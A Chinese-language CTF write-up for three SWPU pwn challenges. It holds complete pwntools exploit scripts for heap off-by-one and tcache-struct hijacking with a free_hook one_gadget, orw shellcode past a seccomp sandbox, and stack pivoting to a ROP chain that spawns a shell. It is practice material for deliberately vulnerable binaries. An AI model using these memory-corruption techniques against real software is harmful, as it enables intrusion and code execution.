SWPU 部分wp

过去的SWPU的题目搬出来做一下

tnote:

off by one堆重叠泄露堆地址
然后劫持到tcache struct(heap_base+0x10处修改counts泄露libc然后正常打free_hook
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("node2.anna.nssctf.cn",28240)
# io=process("./service")
elf=ELF("./service")
libc=ELF("./libc-2.27.so")

def add(s):
    io.sendlineafter(b"choice: ",b"A")
    io.sendlineafter(b"size?",str(s))
    
def edit(n,cc):
    io.sendlineafter(b"choice: ",b"E")
    io.sendlineafter(b"idx?",str(n))
    io.sendlineafter(b"content:",cc)
    
def show(n):
    io.sendlineafter(b"choice: ",b"S")
    io.sendlineafter(b"idx?",str(n))
    
def delete(n):
    io.sendlineafter(b"choice: ",b"D")
    io.sendlineafter(b"idx?",str(n))

# gdb.attach(io)
# pause()

add(0x18) #0
add(0x18) #1
add(0x78) #2
add(0x10) #3

edit(0,cyclic(0x18)+p64(0x61))
delete(1)   
delete(2)
# edit(0,cyclic(0x18)+p64(0x81))
add(0x50) #1 #下标复用,按照delete顺序复用
edit(1,b"a"*0x27+b"b")
show(1)
io.recvuntil(b"b")
heap_addr=u64(io.recv(6).ljust(8,b"\x00"))-0x10 #泄露堆地址
print("heap_addr: "+hex(heap_addr))

edit(1,b"a"*0x18+p64(0x81)+p64(heap_addr+0x10)+p64(0))
add(0x78) #2
add(0x78) #4
edit(4,b"\x07"*0x40+p64(0)*6+p64(heap_addr+0x10))
delete(4)
add(0x78) #4
show(4)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"] #泄露libc地址
print("leak_addr: "+hex(leak_addr))

free_hook=leak_addr+libc.sym[b"__free_hook"]
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
one_gadget=[0x4f3d5,0x4f432,0x10a41c]
shell=leak_addr+one_gadget[1]

edit(4,b"\x02"*0x40+p64(0)*3+p64(free_hook))
add(0x40) #5  
edit(5,p64(shell)) #劫持free_hook打one_gadget

delete(5) #trigger

io.interactive()

# 0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
#   rsp & 0xf == 0
#   rcx == NULL

# 0x4f432 execve("/bin/sh", rsp+0x40, environ)
# constraints:
#   [rsp+0x40] == NULL

# 0x10a41c execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

p1KkHeap:

开启沙盒禁用execve()
mmap开辟rwx段
劫持hook到rwx段上地址打orw shellcode即可
同样需要打tcache struct,注意构造tcachebin的大小
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("node1.anna.nssctf.cn",28176)
# io=process("./SWPUCTF_2019_p1KkHeap")
elf=ELF("./SWPUCTF_2019_p1KkHeap")
libc=ELF("./libc-2.27.so")

def add(s):
    io.sendlineafter(b"Choice: ",b"1")
    io.sendlineafter(b"size: ",str(s))

def show(n):
    io.sendlineafter(b"Choice: ",b"2")
    io.sendlineafter(b"id: ",str(n))
    
def edit(n,cc):
    io.sendlineafter(b"Choice: ",b"3")
    io.sendlineafter(b"id: ",str(n))
    io.sendafter(b"content: ",cc)

def delete(n):
    io.sendlineafter(b"Choice: ",b"4")
    io.sendlineafter(b"id: ",str(n))
    
# gdb.attach(io)
# pause()

mm_addr=0x66660100

add(0x100) #0
add(0x100) #1
delete(0)
delete(0)
show(0)
io.recvuntil(b"content: ")
heap_addr=u64(io.recv(6).ljust(8,b"\x00"))-0x260
print("heap_addr: "+hex(heap_addr))

add(0x100) #2
edit(2,p64(heap_addr+0x10)) 
add(0x100) #3
add(0x100) #4
edit(4,b"\x07"*0x40)
delete(0)
show(0)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"]
print("leak_addr: "+hex(leak_addr))

malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
orw_shellcode=asm(shellcraft.open("/flag")+shellcraft.read(3,mm_addr+0x400,0x50)+shellcraft.write(1,mm_addr+0x400,0x50))

edit(4,b"\x07"*0x40+p64(0)*6+p64(malloc_hook)+p64(0)+p64(mm_addr))
add(0x90) #5
edit(5,orw_shellcode)
add(0x70) #6
edit(6,p64(mm_addr))

add(0x30)

io.interactive()

WheretoGo:

一次溢出的栈迁移模板题,不过因为环境问题最后得迁2次
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("node2.anna.nssctf.cn",28972)
# io=process("./WheretoGo")
elf=ELF("./WheretoGo")
libc=ELF("./libc-2.31.so")

puts_plt=elf.plt[b"puts"]
puts_got=elf.got[b"puts"]
bk_addr=0x4011bd
bss_addr=0x404d00
read_text=0x4011C9
leave_ret=0x4011e0
pop_rdi=0x4012d3

io.recvuntil(b"go?\n")
payload=cyclic(0x80)+p64(bss_addr)+p64(read_text)
payload=payload.ljust(0x100,b"a")
io.send(payload)

payload=p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(bk_addr)
payload=payload.ljust(0x80,b"\x00")+p64(bss_addr-0x80)+p64(leave_ret)
payload=payload.ljust(0x100,b"a")
io.send(payload)

leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr: "+hex(leak_addr))
sys_addr=leak_addr+libc.sym[b"system"]
str_bin_sh=leak_addr+next(libc.search(b"/bin/sh"))


payload=cyclic(0x80)+p64(bss_addr-0x200-0x8)+p64(read_text)
payload=payload.ljust(0x100,b"a")
io.send(payload)

# gdb.attach(io)
# pause()

payload=p64(0)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)
payload=payload.ljust(0x80,b"\x00")+p64(bss_addr-0x280-0x8)+p64(leave_ret)
payload=payload.ljust(0x100,b"a")
io.send(payload)


# payload=cyclic(0x88)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)
# io.send(payload)


io.interactive()

# Gadgets information
# ============================================================
# 0x00000000004011e0 : leave ; ret
# 0x00000000004012cc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012ce : pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012d0 : pop r14 ; pop r15 ; ret
# 0x00000000004012d2 : pop r15 ; ret
# 0x00000000004012cb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012cf : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040115d : pop rbp ; ret
# 0x00000000004012d3 : pop rdi ; ret
# 0x00000000004012d1 : pop rsi ; pop r15 ; ret
# 0x00000000004012cd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret

# Unique gadgets found: 12